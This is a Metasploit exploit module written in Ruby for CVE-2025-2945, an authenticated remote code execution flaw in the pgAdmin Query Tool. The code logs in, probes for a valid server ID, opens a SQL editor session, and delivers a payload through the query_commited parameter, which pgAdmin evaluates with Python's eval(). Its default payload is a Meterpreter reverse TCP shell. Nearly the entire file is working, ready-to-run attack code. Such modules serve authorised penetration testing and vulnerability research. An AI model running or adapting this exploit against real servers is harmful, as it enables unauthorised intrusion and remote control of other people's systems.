165 lines
6.1 KiB
Ruby
165 lines
6.1 KiB
Ruby
##
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# This module requires Metasploit: https://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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class MetasploitModule < Msf::Exploit::Remote
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Rank = ExcellentRanking
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prepend Msf::Exploit::Remote::AutoCheck
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include Msf::Exploit::Remote::HttpClient
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include Msf::Exploit::PgAdmin
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def initialize(info = {})
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super(
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update_info(
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info,
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'Name' => 'pgAdmin Query Tool authenticated RCE (CVE-2025-2945)',
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'Description' => %q{
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This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool
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and send a specific payload in the query_commited POST parameter. This payload is directly executed via a Python eval()
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statement, resulting in remote code execution in versions prior to 9.2.
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To exploit this vulnerability, pgAdmin credentials are required. Additionally, in order to interact with the vulnerable
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SQL editor component, valid database credentials are necessary to initialize a session and obtain a transaction ID,
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which is required for the exploit.
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},
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'Author' => [
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'pyozzi-toss', # Vulnerability discovery
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'jheysel-r7' # msf module
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],
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'License' => MSF_LICENSE,
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'References' => [
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['CVE', '2025-2945'],
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],
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'Platform' => ['python'],
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'Arch' => [ ARCH_PYTHON],
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'Targets' => [
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[
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'Python payload',
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{
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'Platform' => 'python',
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'Arch' => ARCH_PYTHON,
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'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
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}
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]
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => '2025-04-03',
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'Notes' => {
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'Stability' => [CRASH_SAFE],
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'Reliability' => [REPEATABLE_SESSION],
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'SideEffects' => [IOC_IN_LOGS]
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}
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)
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)
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register_options(
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[
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Opt::RPORT(80),
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OptString.new('USERNAME', [true, 'The username to authenticate to pgadmin with', '']),
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OptString.new('PASSWORD', [true, 'The password to authenticate to pgadmin with', '']),
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OptString.new('DB_USER', [true, 'The username to authenticate to the database with', '']),
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OptString.new('DB_PASS', [true, 'The password to authenticate to the database with', '']),
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OptString.new('DB_NAME', [true, 'The database to authenticate to', '']),
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OptInt.new('MAX_SERVER_ID', [true, 'The maximum number of Server IDs to try and connect to.', 10]),
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]
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)
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end
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def check
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# Although there is no low bound mentioned in the advisory, we can see that the vulnerable eval() statement was
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# introduced in version 8.10: https://github.com/pgadmin-org/pgadmin4/commit/22cdb86aab5825787a36d149f8e6eb34fb26d817
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check_version('9.2', '8.10')
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end
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# Return only the required URI encoded fields in order for the POST request to be successful
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# @return [String] The URI encoded form data for the POST request
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def get_post_data
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URI.encode_www_form({
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'title' => Faker::App.name.downcase,
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'selectedNodeInfo' => {
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'database' => {
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'id' => Faker::App.name.downcase
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}
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}
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})
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end
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def post_initialize_sqleditor(trans_id, sgid, sid, did)
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res = send_request_cgi({
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'uri' => normalize_uri(target_uri.path, "/sqleditor/initialize/sqleditor/#{trans_id}/#{sgid}/#{sid}/#{did}"),
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'method' => 'POST',
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'keep_cookies' => true,
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'ctype' => 'application/json',
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'headers' => { 'X-pgA-CSRFToken' => csrf_token },
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'data' => {
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'user' => datastore['DB_USER'],
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'password' => datastore['DB_PASS'],
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'role' => '',
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'dbname' => datastore['DB_NAME']
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}.to_json
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})
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unless res&.code == 200
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errmsg = res&.get_json_document&.dig('result', 'errmsg') || 'unknown error'
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fail_with(Failure::UnexpectedReply, "Failed to initialize sqleditor: #{errmsg}")
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end
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print_good('Successfully initialized sqleditor')
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end
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def find_valid_server_id(sgid)
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(1..datastore['MAX_SERVER_ID']).each do |sid|
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vprint_status("Trying server ID: #{sid}")
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res = send_request_cgi({
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'uri' => normalize_uri(target_uri.path, "/sqleditor/get_server_connection/#{sgid}/#{sid}"),
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'method' => 'GET',
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'keep_cookies' => true,
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'ctype' => 'application/x-www-form-urlencoded',
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'headers' => {
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'X-pgA-CSRFToken' => csrf_token
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}
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})
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if res&.get_json_document&.dig('data', 'status')
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return sid
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end
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end
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fail_with(Failure::NoTarget, 'Failed to find a valid server ID, try increasing MAX_SERVER_ID')
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end
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# In order to interact with the vulnerable component, the SQL editor, we need to initialize a session and a valid
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# transaction ID. This is done by sending a POST request to the sqleditor/panel endpoint with the necessary parameters
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# @return [String] The transaction ID for the SQL editor
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def sqleditor_init(trans_id)
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sgid = rand(1..10)
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did = rand(10000..99999)
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sid = find_valid_server_id(sgid)
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post_initialize_sqleditor(trans_id, sgid, sid, did)
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end
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def exploit
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authenticate(datastore['USERNAME'], datastore['PASSWORD'])
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trans_id = rand(1_000_000..9_999_999)
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sqleditor_init(trans_id)
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print_status('Exploiting the target...')
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res = send_request_cgi({
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'uri' => normalize_uri(target_uri.path, "/sqleditor/query_tool/download/#{trans_id}"),
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'method' => 'POST',
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'ctype' => 'application/json',
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'keep_cookies' => true,
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'headers' => {
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'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/sqleditor/panel/#{trans_id}?is_query_tool=true",
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'X-Pga-Csrftoken' => csrf_token
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},
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'data' => {
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'query_commited' => payload.encoded
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}.to_json
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})
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print_error('No response received from exploit attempt') unless res
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print_good('Received a 500 response from the exploit attempt, this is expected') if res&.code == 500
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print_error("Received an unexpected response code from the exploit attempt: #{res&.code}") if res&.code != 500
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end
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end
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